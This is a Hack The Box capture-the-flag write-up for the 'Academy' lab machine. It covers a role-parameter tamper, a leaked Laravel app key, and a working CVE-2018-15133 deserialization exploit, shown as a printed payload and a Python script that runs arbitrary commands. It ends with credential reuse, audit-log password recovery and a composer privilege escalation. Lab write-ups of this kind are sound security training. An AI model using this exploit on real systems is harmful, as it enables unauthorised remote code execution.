Academy HTB Writeup

Academy 🎓

First scan of nmap we have 2 ports open.

Visiting the website we are redirected to a domain name: academy.htb
I add this to my /etc/hosts file and then visit again. I have a front page with no function at all. But I have 2 options to goto, one is login and the one is register. Upon visiting I have a form in which I can create a user. I try admin:admin and I am being redirected to a page which greats me with Welcome and then redirects me to the login page. I login and get to the front page.

{home.php photo page}

I can see that I am not loggedin as the username I entered the credentials for. I goto register again and add another user but again I am logged in as egre55.

I add a ffuf scan to find potential directories and files. The website has no working functionality at all.

I found found a file admin.php. I am provided a login form again. Trying the same credentials I tried on login.php I cannot login. After looking about potential ways to bypass admin.php or trying to find the credentials by using ffuf. I opened burp and intercepted every request made to login,register,admin and other parts of the website.

On register page I there are 4 parameters the {uid,password,confirm,roleid=0}. The roleid was by default set to 0, when I see a parameter as 0 I think of this as false or as lower privilages in this case. Every time we created a user we sent this parameter as 0, lets try to create a user and set it as 1, and then try to login to admin.php.

So this is a planner they have for the academy.htb page which isn’t yet functionaly. Everything is set as done except one which is pending. I add that subdomain on my /etc/hosts file again and visit the website.

We have a lot of errors. One of the errors is about laravel logs. Laravel is a php framework. At my right I also have some enviroment information and details. I also have mysql username and password. I try to login with those to ssh but nothing. mysql port is closed so I didn’t try them with mysql. I am left with nothing but to search about laravel vulnerabilities. I didn’t manage to find the exact version of it so I tried every exploit I could find of.
This repo https://github.com/kozmic/laravel-poc-CVE-2018-15133 had one exploit that worked. To make this work we need the app_key which we got from the website error. If we didn’t have we couldn’t use it.

Following the repo instructions we have to:

• Install phpgcc (sudo apt install phpgcc)
  ** Generate an unserialized payload phpgcc Laravel/RCE1 system 'id'
• Encrypt the payload with the app_key using ./cve-2018-15133.php dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjg6InVuYW1lIC1hIjt9
• Send the previous string as a X-XSRF-TOKEN header

I created a simple script to do this for me so I can execute commands faster.

automatecve2018-15133.py:

import requests,subprocess,base64,re

from bs4 import BeautifulSoup
app_key = "dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
url = "http://dev-staging-01.academy.htb/"



while(1):
    command = input("Enter command: ")
    phpggc = subprocess.Popen(["phpggc", "Laravel/RCE1", "system", command], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
    gadget = phpggc.stdout.read()
    encodedgadget = base64.b64encode(gadget)
    cve = subprocess.Popen(["./cve-2018-15133.php", app_key, encodedgadget], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
    token = cve.stdout.read()
    token = token.decode("utf-8")
    payload = re.findall(r"TOKEN:(.*?)\n", token)[0]
    headers = {'X-XSRF-TOKEN':payload.strip()}
    r = requests.post(url, headers=headers)
    html = BeautifulSoup(r.text, 'html.parser').prettify()
    print(html.split('\n')[0])

I use the script and execute a reverse shell on my machine. I am logged in as www-data. I try to look into config files located at /var/www/ to find any potential passwords to databases. On laravel web applications these information are stored inside .env file. Beside the .env file I saw for the dev staging subdomain I find another inside the academy folder. This time I have a password mySup3rP4s5w0rd!!. Mysql is opened but I cannot login with these credentials. I cat the /etc/passwd file and find the users on the machine and try the password against each user.

cry0l1t3 is the user which reused the password and got pwned :D. Now I run lineum script but didn’t manage to find anything useful. After more than half an hour of trying to find something juicy I find out that I belong to adm group. As per https://wiki.debian.org/SystemGroups adm: Group adm is used for system monitoring tasks. Members of this group can read many log files in /var/log. I go and search on /var/log folder for passwords or anything similar which can give me more info to go near root user :D. After some help from my friend suljot, I found out commands are logged inside audit folder and are encoded as hex. Each command has type=TTY, so I can all the files and grep that.

cat /var/log/audit/* | grep 'type=TTY' > /tmp/a
cat /tmp/a | awk -F'data=' '{print $2}' | xxd -r -p > tty
less tty

The password works with user mrb3n. This user can run composer as root. I go and find a way on gtfobins and get root.